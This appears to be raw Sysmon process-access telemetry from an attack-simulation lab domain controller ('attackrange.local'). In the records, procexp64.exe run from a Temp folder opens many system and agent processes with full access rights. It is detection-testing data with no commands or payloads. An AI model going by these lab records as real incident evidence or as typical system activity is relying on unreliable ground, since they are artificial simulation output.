15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 